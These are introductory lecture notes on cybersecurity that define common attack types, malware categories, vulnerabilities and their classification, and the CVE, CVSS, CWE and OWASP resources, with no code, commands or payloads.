Lecture 3

Cyber Attacks

A cyber-attack is a deliberate and malicious attempt to exploit vulnerabilities in computer systems,

networks, or software applications for various purposes, including unauthorized access, data theft,
disruption of services, or causing damage.

These attacks are typically carried out by individuals or groups with malicious intent, such as hackers,
cybercriminals, or state-sponsored actors.

Types of Cyber Attacks

Advanced Persistent Threat (APT):

APT is a prolonged and targeted cyber-attack in which an unauthorized person gains access to a network
and remains undetected for an extended period. APTs are often sophisticated and may involve multiple
stages to achieve the attacker's objectives.

Backdoor:

A backdoor is a method used to bypass normal authentication and gain unauthorized access to an
operating system (OS) or application. It provides a secret entry point for attackers to enter a system
without being detected.

Buffer Overflow:

Buffer overflow is an exploit that takes advantage of a program waiting for user input. By overflowing the
allocated memory space, attackers can execute malicious code, potentially leading to system crashes or
unauthorized access.

Man-in-the-middle Attack:

In a man-in-the-middle attack, an attacker intercepts and relays messages between two parties who are
communicating directly. This allows the attacker to eavesdrop on or manipulate the communication
without the knowledge of the communicating parties.

Cross-Site Scripting (XSS):

XSS is a code injection attack where an attacker injects malicious scripts, often JavaScript, into a web
application. These scripts are then executed in the context of another user's browser, allowing the
attacker to steal information or perform actions on behalf of the user.

Denial of Service (DoS) Attack:

A DoS attack aims to disrupt or temporarily disable the services of a system or network, making it
inaccessible to authorized users. This is achieved by overwhelming the target with a flood of traffic or
exploiting vulnerabilities to exhaust resources.
SQL Injection:

SQL injection is a common web application vulnerability that allows attackers to manipulate a website's
database by injecting malicious SQL code. This can result in unauthorized access, data theft, or alteration
of the database.

Zero-day Exploit:

A zero-day exploit targets a vulnerability in a system or software that has been discovered by attackers
before the vendor releases a patch or fix. Since there is no defense in place, zero-day exploits can be
highly effective until a security update is applied.

Impacts of Cyber Attacks:

Financial Loss: Organizations may incur financial losses due to the costs of mitigating the attack, system
downtime, and potential theft of financial information.

Reputational Damage: Successful cyber-attacks can harm an organization's reputation, eroding customer
trust and confidence.

Legal Consequences: Depending on the nature of the attack and the data compromised, legal
consequences may arise, including regulatory fines and lawsuits.
 Malicious Code
Virus:

Description: A virus is a type of malicious software that, when executed, has the ability to replicate itself
by modifying other computer programs and inserting its own code. Viruses often attach themselves to
executable files or documents, spreading when the infected file is shared or opened.

Network Worm:

Description: A network worm is standalone malware designed to replicate itself across computer
networks. Unlike viruses, worms don't need a host program to attach to and can independently spread
to other computers. They exploit vulnerabilities in network protocols to propagate.

Trojan Horse:

Description: A Trojan Horse is a deceptive program that disguises itself as something legitimate or
beneficial, but once installed, it introduces malicious code onto the system. Unlike viruses or worms,
Trojans do not replicate independently but rely on user actions to spread.

Botnet:

Description: A botnet is a network of compromised computers, often controlled by a central server or

attacker. These compromised machines, known as bots, can be used for various malicious activities,
including distributed denial-of-service (DDoS) attacks, data theft, spam distribution, and providing the
attacker with unauthorized access to the compromised devices.

Keylogger:

Description: Keyloggers are surveillance tools that monitor and record every keystroke typed on a
specific computer's keyboard. Attackers use keyloggers to capture sensitive information such as
passwords, usernames, and other confidential data.

Rootkit:

Description: A rootkit is a collection of tools or programs designed to enable unauthorized access to a

computer or computer network. Rootkits often aim to hide their presence on the system by
manipulating system processes and evading detection by security software.

Spyware:

Description: Spyware is software that operates covertly on a user's system, collecting information about
their internet activities, keystrokes, passwords, and other valuable data. The collected data is often sent
to third parties without the user's knowledge or consent.

Adware:

Description: Adware is designed to display advertisements on a user's computer. It may also redirect
search requests to advertising websites to collect marketing data about the user's preferences. While not
always inherently malicious, excessive adware can be intrusive and negatively impact user experience.
Ransomware:

Ransomware is a type of malware that restricts users from accessing their system or files. It either locks
the system's screen or encrypts the user's files, demanding a ransom payment for their release. Paying
the ransom does not guarantee that the files will be restored, and it encourages further criminal activity.

Vulnerabilities
A vulnerability in the context of cybersecurity refers to a weakness or flaw in a system's design,
implementation, configuration, or operation that can be exploited by attackers to compromise the
system's security. It is essentially a point of weakness in the system's defenses that, if discovered and
exploited, can lead to unauthorized access, data breaches, or other security incidents.

The concept of vulnerability involves three key elements:

A Flaw in the System:

This refers to a mistake or oversight in the design, development, or configuration of a system. It could be
a programming error, misconfiguration, or other weaknesses in the system's architecture that creates an
opening for potential exploitation.

Access of Attacker to that Flaw:

For a vulnerability to be exploited, an attacker needs to have access to the identified flaw. This access
could be gained through various means, such as network connections, physical access to a device, or
even social engineering techniques that trick users into inadvertently providing access.

Capability of Attacker to Exploit the Flaw:

Even if a flaw exists and the attacker has access to it, successful exploitation also depends on the
attacker's ability to craft and execute an exploit. This requires a certain level of technical knowledge and
skill to create and deploy the code or techniques necessary to take advantage of the vulnerability.
 Classification of Vulnerabilities:
Vulnerabilities are like weak points in different parts of a computer system. They can be classified based
on what they might affect:

Hardware:

This includes vulnerabilities related to the physical parts of computers, like the actual machines and
devices.

Software:

These vulnerabilities are in the programs and apps we use on computers. It's like finding a mistake in a
game or an application.

Network:

Network vulnerabilities involve weaknesses in the way computers connect and communicate with each
other. It's like having a hole in the fence that lets someone in.

Personal:

Personal vulnerabilities relate to weaknesses that involve people, like users making mistakes or being
tricked into doing something harmful.

Physical Site:

This is about vulnerabilities related to the actual physical location of computers, like security issues in a
building where servers are kept.

Organizational:

Organizational vulnerabilities involve weaknesses in how a company or group manages its computer
systems and information.

CVE (Common Vulnerabilities and Exposures):

Definition: CVE is a dictionary or catalog of known vulnerabilities in software and hardware. Each
vulnerability is assigned a unique identifier (CVE ID).

CVSS (Common Vulnerability Scoring System):

Description: A scoring system used to quantify the threat level posed by a vulnerability. It provides a
numerical score, helping individuals and organizations prioritize and address vulnerabilities based on
their severity.

CWE (Common Weakness Enumeration):

Description: A catalog of common mistakes and weaknesses that can lead to vulnerabilities in software.
It serves as a guidebook to understand and address typical problems in software security.\

OWASP TOP 10 VULNERABILITIES

OWASP, or the Open Web Application Security Project, is a nonprofit organization focused on improving
software security. They provide resources and tools, with the OWASP Top Ten being a prominent list of
the most critical web application security risks. OWASP encourages collaboration among security
professionals and offers projects like OWASP ZAP for testing vulnerabilities and OWASP SAMM for
software security strategies. Following OWASP guidelines helps organizations enhance the security of
their web applications.